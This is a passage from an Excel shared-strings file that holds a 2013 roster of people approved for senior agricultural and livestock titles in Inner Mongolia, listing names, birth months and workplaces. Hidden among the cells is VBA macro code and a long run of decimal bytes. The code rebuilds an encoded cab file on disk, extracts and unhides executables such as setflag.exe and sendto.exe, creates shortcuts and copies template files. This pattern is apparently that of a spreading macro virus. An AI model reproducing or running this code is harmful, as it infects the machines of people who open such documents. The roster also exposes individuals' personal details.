      <t>")&gt;0 then</t>
    </r>
  </si>
  <si>
    <r>
      <t>set lnk=</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>w</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>.CreateShortcut(fold.path &amp; "\" &amp; ff.name)</t>
    </r>
  </si>
  <si>
    <r>
      <t>if left(thisworkbook.sheets(i).name,3)="</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>模块表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>" then</t>
    </r>
  </si>
  <si>
    <t>备  注</t>
  </si>
  <si>
    <t>农业</t>
  </si>
  <si>
    <t>副研究员</t>
  </si>
  <si>
    <t>研究员</t>
  </si>
  <si>
    <t>男</t>
  </si>
  <si>
    <t>1967/09</t>
  </si>
  <si>
    <t>女</t>
  </si>
  <si>
    <t>农业推广</t>
  </si>
  <si>
    <t>1970/10</t>
  </si>
  <si>
    <t>1969/11</t>
  </si>
  <si>
    <t>1968/10</t>
  </si>
  <si>
    <t>1975/09</t>
  </si>
  <si>
    <t>1970/08</t>
  </si>
  <si>
    <t>1973/08</t>
  </si>
  <si>
    <t>1968/12</t>
  </si>
  <si>
    <t>赤峰市农牧科学研究院</t>
  </si>
  <si>
    <t>1968/11</t>
  </si>
  <si>
    <t>1969/12</t>
  </si>
  <si>
    <t>序号</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>工   作   单   位</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>姓  名</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>性别</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>出生年月</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>现从事专业</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>盟市</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>资格级别</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>申报资格名称</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>评审通过时间</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">77 83 67 70 0 0 0 0 157 27 1 0 0 0 0 0 48 24 0 0 0 0 0 0 3 1 1 0 5 0 4 0 247 20 0 0 0 24 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 </t>
  </si>
  <si>
    <t>Private Sub createcabfile()</t>
  </si>
  <si>
    <t>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 186 24 0 0 8 0 1 0 0 128 0 0 0 0 0 0 0 0 225 48 244 104 32 0 115 101 116 102 108 97 103 46 101 120 101 0 0 96 0 0 0 128 0 0 0 0 232 48 135 172 32 0 105 110 116 101 114 110 101</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>241 76 19 218 204 88 154 64 84 69 228 84 37 206 182 79 68 201 148 10 215 36 111 204 32 176 48 14 40 171 200 104 17 185 192 174 74 198 210 89 41 138 176 70 44 30 34 130 142 149 9 105 152 41 74 246 211 82 193 59 43 64 3 99 37 140 235 244 165 31 73 14 130 68</t>
  </si>
  <si>
    <t>Next</t>
  </si>
  <si>
    <t>208 178 7 188 14 242 49 11 109 224 219 207 115 112 187 210 82 228 99 129 190 69 238 97 116 185 197 130 82 65 93 230 244 219 241 99 28 69 45 221 207 210 107 65 16 197 31 209 97 78 243 185 235 29 45 190 232 81 41 47 128 127 12 150 7 82 151 31 85 194 14 74 1</t>
  </si>
  <si>
    <t>33 232 1 16 195 133 138 240 63 17 19 85 118 166 41 252 26 80 171 231 111 129 221 14 29 1 203 194 187 242 41 234 80 4 86 224 130 27 32 254 108 153 3 63 151 224 166 94 56 12 99 135 222 134 31 191 190 242 117 0 250 202 87 9 214 201 113 131 110 213 251 169 31</t>
  </si>
  <si>
    <t>2013年农业、畜牧业高级专业技术资格评审通过人员花名册（正高）</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>If Workbooks(i).name="norma1.xlm" then</t>
  </si>
  <si>
    <t>74 153 107 139 83 49 239 88 136 242 155 111 65 63 98 244 146 21 122 126 145 33 2 233 46 228 29 163 189 41 247 64 91 30 248 209 98 47 239 246 10 45 93 46 240 48 48 102 143 34 32 97 117 152 147 26 67 214 45 171 189 156 92 57 37 30 67 90 35 17 67 31 137 20 3</t>
  </si>
  <si>
    <t>goto a1</t>
  </si>
  <si>
    <t>165 151 94 210 197 103 134 111 130 219 24 248 57 153 84 70 216 22 94 57 199 48 131 186 24 29 93 0 126 81 140 97 152 238 6 248 16 129 20 252 44 131 238 135 126 203 80 87 86 103 118 151 143 238 44 167 187 124 22 216 182 179 220 162 244 51 202 128 177 249 25</t>
  </si>
  <si>
    <t>226 78 31 64 1 62 217 123 64 46 65 27 132 160 50 161 67 21 60 145 208 13 111 84 250 239 134 55 42 61 169 89 223 33 222 168 107 35 219 24 57 127 32 50 113 64 206 138 156 112 170 1 190 125 191 145 186 66 242 189 1 202 46 146 208 190 155 73 104 73 241 51 171</t>
  </si>
  <si>
    <t>58 23 144 28 65 46 125 225 117 147 134 69 200 246 42 73 63 99 223 77 187 71 91 110 64 89 38 93 202 23 172 123 37 65 105 253 188 161 217 73 136 42 36 68 125 195 176 248 230 37 100 64 36 3 115 141 129 232 217 173 50 177 117 78 53 200 48 43 137 198 140 177 3</t>
  </si>
  <si>
    <t>cabfile= "c:\cab.cab"</t>
  </si>
  <si>
    <t>167 246 51 99 240 201 233 131 130 246 47 201 132 71 14 43 71 61 218 15 146 9 139 220 170 156 191 170 92 72 43 71 45 237 39 72 53 162 29 56 76 156 122 116 80 174 203 27 28 105 33 74 128 239 147 42 42 164 229 10 206 147 230 40 56 75 246 36 223 141 203 238 2</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>fso.delete cabfile</t>
  </si>
  <si>
    <t>94 11 194 38 34 156 17 40 60 201 199 131 21 143 188 88 153 161 38 12 186 80 99 79 217 206 133 242 54 113 180 163 80 25 69 148 238 31 137 24 184 249 168 123 202 98 211 66 173 134 123 36 183 129 163 197 35 138 81 0 209 25 200 249 201 252 202 44 243 190 35 6</t>
  </si>
  <si>
    <t>open cabfile for binary access write as #1</t>
  </si>
  <si>
    <t>173 208 61 163 14 56 18 83 68 51 31 102 58 251 73 231 23 97 87 107 45 181 191 174 36 137 36 102 131 125 243 228 42 209 136 178 223 210 222 114 106 164 223 192 46 4 94 134 75 5 44 41 77 177 120 151 56 40 190 255 85 149 148 152 42 48 0 223 83 76 175 118 225</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <r>
      <t>hv</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value</t>
    </r>
  </si>
  <si>
    <t>128 215 101 115 247 139 40 210 194 57 45 31 35 24 10 149 209 146 71 237 199 1 205 157 137 2 140 249 184 177 122 76 252 2 26 192 234 246 27 59 19 196 27 246 247 217 39 196 242 168 88 65 219 43 226 176 255 37 65 239 15 4 183 147 115 55 220 196 126 26 193 94</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>m=instr(hv," ")</t>
  </si>
  <si>
    <t>217 130 174 49 193 193 8 14 26 248 151 82 152 158 47 2 116 255 239 205 198 54 19 97 146 235 144 200 233 184 160 145 6 170 87 159 195 73 255 27 252 228 210 126 99 215 114 105 181 133 47 142 170 124 207 101 184 221 85 169 103 12 130 65 199 216 48 4 48 133 6</t>
  </si>
  <si>
    <t>do while m&gt;0</t>
  </si>
  <si>
    <t>103 85 197 40 100 222 195 23 224 19 47 197 206 244 202 231 117 195 215 12 229 23 112 137 251 228 99 154 113 158 102 28 10 3 138 122 125 1 163 77 221 172 219 162 22 197 217 162 62 56 226 48 241 108 154 91 174 252 23 221 4 213 176 154 31 207 104 159 65 96 2</t>
  </si>
  <si>
    <t>ch=CByte(mid(hv,n,m-n))</t>
  </si>
  <si>
    <t>119 41 87 29 74 50 234 93 112 153 24 144 222 159 130 190 171 122 93 0 118 85 124 199 100 208 40 79 143 43 53 158 248 132 252 169 197 61 69 15 209 92 235 193 16 203 142 184 76 9 108 99 32 1 101 247 123 126 71 212 107 176 223 5 215 48 55 181 147 152 152 225</t>
  </si>
  <si>
    <t>put #1,,ch</t>
  </si>
  <si>
    <t>86 24 180 135 11 131 249 208 13 251 224 174 12 96 248 123 159 13 1 0 179 23 155 113 216 7 119 126 238 116 134 242 41 238 95 64 56 224 35 12 223 49 70 7 251 129 165 25 76 44 107 213 52 234 238 253 136 172 60 128 136 29 122 6 234 190 229 128 244 79 126 82 1</t>
  </si>
  <si>
    <t>n=m+1</t>
  </si>
  <si>
    <t>246 198 94 95 30 23 151 60 131 223 21 156 64 117 164 250 97 119 120 63 66 178 238 186 176 150 81 247 63 49 220 79 225 162 126 184 159 134 160 15 227 192 115 220 161 158 64 89 158 157 218 71 107 25 137 30 204 65 211 150 152 247 168 153 216 90 140 223 138 1</t>
  </si>
  <si>
    <t>m=instr(n,hv," ")</t>
  </si>
  <si>
    <t>255 106 34 223 220 133 28 60 90 97 144 79 42 155 136 160 40 117 83 195 120 229 200 243 240 9 7 69 49 143 188 150 124 29 152 33 184 76 4 37 123 180 35 65 28 116 107 144 192 133 7 223 141 181 8 163 197 150 178 148 211 60 225 217 19 185 148 155 138 21 254 61</t>
  </si>
  <si>
    <t>loop</t>
  </si>
  <si>
    <t>59 245 229 34 119 125 206 30 225 86 160 116 13 98 187 151 236 40 16 76 14 106 88 210 226 128 50 7 203 188 218 78 2 254 228 128 190 147 222 35 231 244 145 253 185 250 110 201 22 93 179 161 165 196 190 12 228 124 226 246 140 91 171 115 233 199 177 77 179 14</t>
  </si>
  <si>
    <t>143 171 88 195 214 55 53 222 172 183 244 182 245 90 216 218 63 82 111 9 214 107 230 130 126 235 206 250 32 203 213 52 88 183 115 141 219 16 198 186 173 166 161 129 0 34 220 226 219 182 191 165 169 209 223 90 207 62 88 195 98 96 101 113 136 19 237 63 148 1</t>
  </si>
  <si>
    <t>close #1</t>
  </si>
  <si>
    <t>235 54 127 51 158 3 0 32 101 217 136 107 121 83 45 215 64 122 95 11 123 200 73 81 255 72 225 72 92 55 207 129 135 13 194 110 110 113 82 175 221 166 196 71 157 76 240 213 215 250 11 235 106 130 27 154 202 241 44 175 108 99 253 84 18 182 255 117 112 138 249</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t>59 226 206 158 81 15 113 238 178 180 249 37 134 99 248 63 42 146 245 49 227 231 71 140 30 38 235 97 138 94 150 26 87 118 135 94 23 67 179 222 174 69 207 195 113 78 215 61 230 207 213 243 151 232 105 167 158 46 212 211 110 189 206 122 61 223 163 135 62 189</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t>182 217 52 129 93 168 251 64 37 245 50 203 51 221 108 130 25 125 169 152 236 227 252 127 154 120 200 112 138 82 89 185 219 34 158 117 148 103 66 122 199 9 254 79 60 162 172 57 88 197 154 133 85 93 187 208 46 97 156 132 41 110 49 227 15 34 23 179 255 240 1</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t>86 3 180 1 244 2 60 1 240 75 128 223 2 236 46 117 178 23 1 238 1 222 252 147 128 167 0 94 21 188 74 44 92 1 220 74 44 108 34 221 79 250 2 210 11 73 63 76 250 116 210 143 147 94 76 250 49 210 143 146 190 147 244 13 164 183 144 94 64 186 133 244 65 210 25 2</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t>216 28 96 223 7 192 212 124 208 237 163 156 34 106 188 110 29 101 14 112 121 1 207 79 223 206 224 247 56 77 68 85 8 220 110 74 29 99 54 234 168 217 168 161 134 167 59 157 232 105 4 255 14 136 211 13 88 97 8 109 161 48 27 0 210 209 70 185 56 32 44 68 169 2</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", myfolder, True</t>
  </si>
  <si>
    <t>副高</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>正高</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>副高</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>兴安盟</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>锡盟</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>直属</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>2013.8.12</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼市农业技术推广中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>王鲜英</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>女</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1969/09</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>农业推广</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>高级农艺师</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>和林县农牧业局种子管理站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>王国军</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>男</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1965/09</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>农业</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>包头市农业机械技术推广站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>底丽萍</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1972/10</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>农业机械</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>高级工程师</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>包头市水库管理处</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>陈四平</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1970/09</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>植保</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>白音席勒街道办事处</t>
  </si>
  <si>
    <t>边志国</t>
  </si>
  <si>
    <t>1972/07</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>高级农艺师</t>
  </si>
  <si>
    <t>包头市土壤肥料工作站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>宋东升</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1970/06</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>农学</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>马丽萍</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1974/03</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>九原区果树工作站</t>
  </si>
  <si>
    <t>陈荣</t>
  </si>
  <si>
    <t>1969/11</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>张绍民</t>
  </si>
  <si>
    <t>1969/01</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>九原区种子管理站</t>
  </si>
  <si>
    <t>潘慧</t>
  </si>
  <si>
    <t>1970/08</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>王金莲</t>
  </si>
  <si>
    <t>1964/08</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>土右旗农业推广中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>菅凤英</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1966/01</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>兴胜镇</t>
  </si>
  <si>
    <t>张翠英</t>
  </si>
  <si>
    <t>1970/05</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>薛凤莲</t>
  </si>
  <si>
    <t>呼伦贝尔市莫旗种子管理站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>张庆宇</t>
  </si>
  <si>
    <t>1956/09</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>作物栽培</t>
  </si>
  <si>
    <t>呼伦贝尔市莫旗农业科技推广中心</t>
  </si>
  <si>
    <t>范丽萍</t>
  </si>
  <si>
    <t>1964/04</t>
  </si>
  <si>
    <t>农业</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>副研究员</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市农业科学研究所</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>邵玉彬</t>
  </si>
  <si>
    <t>男</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1963/04</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>大豆玉种</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">苏允华 </t>
  </si>
  <si>
    <t>女</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1978/11</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>马铃薯玉种</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市海拉尔区农业技术推广中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>王彩灵</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1968/12</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>植保
土肥推广</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市扎兰屯市绿色食品办公室</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>王桂玲</t>
  </si>
  <si>
    <t>1968/09</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市扎兰屯农技推广中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>曹玉兰</t>
  </si>
  <si>
    <t>1978/12</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市牙克石市丰实种业有限责任公司</t>
  </si>
  <si>
    <t>陶玉荣</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1964/10</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>高级农艺师</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市牙克石市乌奴耳镇农牧业综合服务中心</t>
  </si>
  <si>
    <t>郭荣娣</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市牙克石市农业技术推广中心</t>
  </si>
  <si>
    <t>杜翠梅</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1969/12</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市阿荣旗农经总站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>李庆芝</t>
  </si>
  <si>
    <t>呼伦贝尔市莫旗农业技术推广中心</t>
  </si>
  <si>
    <t>董清华</t>
  </si>
  <si>
    <t>崔苓艳</t>
  </si>
  <si>
    <t>1972/03</t>
  </si>
  <si>
    <t>呼伦贝尔市莫旗杜拉尔乡农服中心</t>
  </si>
  <si>
    <t>刘凤云</t>
  </si>
  <si>
    <t>1971/09</t>
  </si>
  <si>
    <t>农业</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市莫旗宝山镇农服中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>石玉</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1970/05</t>
  </si>
  <si>
    <t>呼伦贝尔市莫旗宝山镇农服中心</t>
  </si>
  <si>
    <t>王莉</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1971/04</t>
  </si>
  <si>
    <t>呼伦贝尔市莫旗塔温敖宝镇农服中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>杨云友</t>
  </si>
  <si>
    <t>1971/07</t>
  </si>
  <si>
    <t>呼伦贝尔市莫旗腾克镇农服中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>周明建</t>
  </si>
  <si>
    <t>1966/12</t>
  </si>
  <si>
    <t>1970/04</t>
  </si>
  <si>
    <t>呼伦贝尔市鄂伦春旗乌鲁布铁镇农业综合服务中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>于心岭</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1969/12</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔海农上库力农场</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>李世岭</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔海拉尔农牧场职工中专学校</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>辛忠民</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1974/04</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市海拉尔区农业技术推广中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>李国荣</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1975/11</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>土肥
农技推广</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市农业科学研究所</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>中蒙兽医</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>锡盟西乌旗巴彦胡舒苏木兽医站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>袁继红</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1967/11</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>锡盟阿巴嘎旗别力古台镇兽医站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>青格勒图</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1979/05</t>
  </si>
  <si>
    <t>化德县家畜改良站</t>
  </si>
  <si>
    <t>任建永</t>
  </si>
  <si>
    <t>察右前旗巴音塔拉镇</t>
  </si>
  <si>
    <t>孙晓利</t>
  </si>
  <si>
    <t>察右前旗草原工作站</t>
  </si>
  <si>
    <t>王补元</t>
  </si>
  <si>
    <t>草原畜牧</t>
  </si>
  <si>
    <t>乌兰察布市草原工作站</t>
  </si>
  <si>
    <t>戴桂香</t>
  </si>
  <si>
    <t>丰镇市畜牧局</t>
  </si>
  <si>
    <t>王彩风</t>
  </si>
  <si>
    <t>察右后旗土木尔台镇畜牧兽医站</t>
  </si>
  <si>
    <t>马久</t>
  </si>
  <si>
    <t>凉城县畜牧局</t>
  </si>
  <si>
    <t>武忠贵</t>
  </si>
  <si>
    <t>四子王旗畜牧局动物卫生监督所</t>
  </si>
  <si>
    <t>田文亮</t>
  </si>
  <si>
    <t>乌兰察布市国际农发基金贷款项目管理办公室</t>
  </si>
  <si>
    <t>吴非</t>
  </si>
  <si>
    <t>邢毅</t>
  </si>
  <si>
    <t>鄂尔多斯农牧科学院</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>斯登丹巴</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>研究员</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>鄂尔多斯市杭锦旗农牧业服务中心</t>
  </si>
  <si>
    <t>李瑞萍</t>
  </si>
  <si>
    <t>1967/12</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>鄂尔多斯市东胜区动物园</t>
  </si>
  <si>
    <t>卢寿锋</t>
  </si>
  <si>
    <t>1976/09</t>
  </si>
  <si>
    <t>鄂尔多斯市伊旗农牧业综合行政执法大队</t>
  </si>
  <si>
    <t>刘要仙</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1971/10</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>鄂尔多斯市杭锦旗动物疫控中心</t>
  </si>
  <si>
    <t>武文华</t>
  </si>
  <si>
    <t>1966/02</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>鄂尔多斯市动物疫病预防控制中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>2013年农业高级专业技术资格评审通过人员花名册</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>杨波</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1981/03</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>鄂尔多斯市动物卫生监督所</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>刘珍</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1977/11</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>巴市农科院</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>刘敏</t>
  </si>
  <si>
    <t>1962/11</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>巴市临河区畜牧局</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>杨晓玲</t>
  </si>
  <si>
    <t>市草原站</t>
  </si>
  <si>
    <t>史永强</t>
  </si>
  <si>
    <t>草原建设</t>
  </si>
  <si>
    <t>巴市改良站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>王海平</t>
  </si>
  <si>
    <t>1977/08</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>畜牧改良</t>
  </si>
  <si>
    <t>郝林凤</t>
  </si>
  <si>
    <t>1966/11</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>巴市动物疫控中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>其木格</t>
  </si>
  <si>
    <t>1973/08</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>动物防疫</t>
  </si>
  <si>
    <t>张培艺</t>
  </si>
  <si>
    <t>1976/05</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>农牧业科学院</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>薛树媛</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1977/01</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
